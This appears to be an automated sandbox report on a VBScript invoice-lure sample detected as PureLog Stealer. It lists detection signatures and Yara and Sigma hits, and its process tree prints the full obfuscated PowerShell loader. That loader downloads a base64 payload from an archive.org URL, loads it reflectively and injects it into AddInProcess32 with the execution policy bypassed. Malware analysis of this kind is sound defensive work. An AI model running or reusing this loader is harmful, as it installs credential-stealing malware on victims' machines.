Windows
Analysis Report
RFQ 2024.09.26-89 vivecta.vbs
Overview
General Information
Detection
PureLog Stealer
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5964 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 3740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39, [cHar]36)| iNVOKe-eXpRESSIoN" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
 | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | 
System Summary
Source: | Author: Florian Roth (Nextron Systems)